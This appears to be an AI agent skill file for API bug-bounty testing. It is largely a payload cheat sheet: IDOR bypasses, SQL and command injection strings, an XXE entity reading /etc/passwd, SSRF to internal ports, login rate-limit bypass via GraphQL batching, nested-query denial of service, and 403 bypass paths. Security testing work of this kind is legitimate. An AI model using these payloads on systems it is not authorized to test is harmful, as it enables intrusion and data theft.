| name | API Fuzzing for Bug Bounty |
| description | This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques. |
| version | 1.0.0 |
| tags | ["api-security","bug-bounty","fuzzing","idor","graphql","rest-api","penetration-testing"] |
API Fuzzing for Bug Bounty
Purpose
Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
Inputs/Prerequisites
- Burp Suite or similar proxy tool
- API wordlists (SecLists, api_wordlist)
- Understanding of REST/GraphQL/SOAP protocols
- Python for scripting
- Target API endpoints and documentation (if available)
Outputs/Deliverables
- Identified API vulnerabilities
- IDOR exploitation proofs
- Authentication bypass techniques
- SQL injection points
- Unauthorized data access documentation
API Types Overview
| Type | Protocol | Data Format | Structure |
|---|
| SOAP | HTTP | XML | Header + Body |
| REST | HTTP | JSON/XML/URL | Defined endpoints |
| GraphQL | HTTP | Custom Query | Single endpoint |
Core Workflow
Step 1: API Reconnaissance
Identify API type and enumerate endpoints:
/swagger.json
/openapi.json
/api-docs
/v1/api-docs
/swagger-ui.html
kr scan https://target.com -w routes-large.kite
python3 json2paths.py swagger.json
Step 2: Authentication Testing
/api/mobile/login
/api/v3/login
/api/magic_link
/api/admin/login
Step 3: IDOR Testing
Insecure Direct Object Reference is the most common API vulnerability:
GET /api/users/1234 → GET /api/users/1235
/?user_id=111 instead of /?user_id=user@mail.com
IDOR Bypass Techniques:
{"id":111} → {"id":[111]}
{"id":111} → {"id":{"id":111}}
URL?id=<LEGIT>&id=<VICTIM>
{"user_id":"*"}
/api/get_profile?user_id=<victim>&user_id=<legit>
{"user_id":<legit_id>,"user_id":<victim_id>}
Step 4: Injection Testing
SQL Injection in JSON:
{"id":"56456"} → OK
{"id":"56456 AND 1=1#"} → OK
{"id":"56456 AND 1=2#"} → OK
{"id":"56456 AND 1=3#"} → ERROR (vulnerable!)
{"id":"56456 AND sleep(15)#"} → SLEEP 15 SEC
Command Injection:
?url=Kernel#open → ?url=|ls
api.url.com/endpoint?name=file.txt;ls%20/
XXE Injection:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
SSRF via API:
<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>
Step 5: Method Testing
GET /api/v1/users/1
POST /api/v1/users/1
PUT /api/v1/users/1
DELETE /api/v1/users/1
PATCH /api/v1/users/1
Content-Type: application/json → application/xml
GraphQL-Specific Testing
Introspection Query
Fetch entire backend schema:
{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
URL-encoded version:
/graphql?query={__schema{types{name,kind,description,fields{name}}}}
GraphQL IDOR
query {
user(id: "OTHER_USER_ID") {
email
password
creditCard
}
}
GraphQL SQL/NoSQL Injection
mutation {
login(input: {
email: "test' or 1=1--"
password: "password"
}) {
success
jwt
}
}
Rate Limit Bypass (Batching)
mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
GraphQL DoS (Nested Queries)
query {
posts {
comments {
user {
posts {
comments {
user {
posts { ... }
}
}
}
}
}
}
}
GraphQL Tools
| Tool | Purpose |
|---|
| GraphCrawler | Schema discovery |
| graphw00f | Fingerprinting |
| clairvoyance | Schema reconstruction |
| InQL | Burp extension |
| GraphQLmap | Exploitation |
Endpoint Bypass Techniques
When receiving 403/401, try these bypasses:
/api/v1/users/sensitivedata → 403
/api/v1/users/sensitivedata.json
/api/v1/users/sensitivedata?
/api/v1/users/sensitivedata/
/api/v1/users/sensitivedata??
/api/v1/users/sensitivedata%20
/api/v1/users/sensitivedata%09
/api/v1/users/sensitivedata#
/api/v1/users/sensitivedata&details
/api/v1/users/..;/sensitivedata
Output Exploitation
PDF Export Attacks
<iframe src="file:///etc/passwd" height=1000 width=800>
<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>
<img src="https://iplogger.com/yourcode.gif"/>
DoS via Limits
/api/news?limit=100
/api/news?limit=9999999999
Quick Reference
| Vulnerability | Test Payload | Risk |
|---|
| IDOR | Change user_id parameter | High |
| SQLi | ' OR 1=1-- in JSON | Critical |
| Command Injection | ; ls / | Critical |
| XXE | DOCTYPE with ENTITY | High |
| SSRF | Internal IP in params | High |
| Rate Limit Bypass | Batch requests | Medium |
| Method Tampering | GET→DELETE | High |
Tools Reference
| Category | Tool | URL |
|---|
| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |
| API Discovery | Kiterunner | github.com/assetnote/kiterunner |
| GraphQL | InQL | github.com/doyensec/inql |
| Wordlists | SecLists | github.com/danielmiessler/SecLists |
| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |
| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |
Constraints
Must:
- Test mobile, web, and developer APIs separately
- Check all API versions (/v1, /v2, /v3)
- Validate both authenticated and unauthenticated access
Must Not:
- Assume same security controls across API versions
- Skip testing undocumented endpoints
- Ignore rate limiting checks
Should:
- Add
X-Requested-With: XMLHttpRequest header to simulate frontend
- Check archive.org for historical API endpoints
- Test for race conditions on sensitive operations
Examples
Example 1: IDOR Exploitation
GET /api/v1/invoices/12345
Authorization: Bearer <token>
GET /api/v1/invoices/12346
Authorization: Bearer <token>
Example 2: GraphQL Introspection
curl -X POST https://target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{__schema{types{name,fields{name}}}}"}'
Troubleshooting
| Issue | Solution |
|---|
| API returns nothing | Add X-Requested-With: XMLHttpRequest header |
| 401 on all endpoints | Try adding ?user_id=1 parameter |
| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |
| Rate limited | Use IP rotation or batch requests |
| Can't find endpoints | Check Swagger, archive.org, JS files |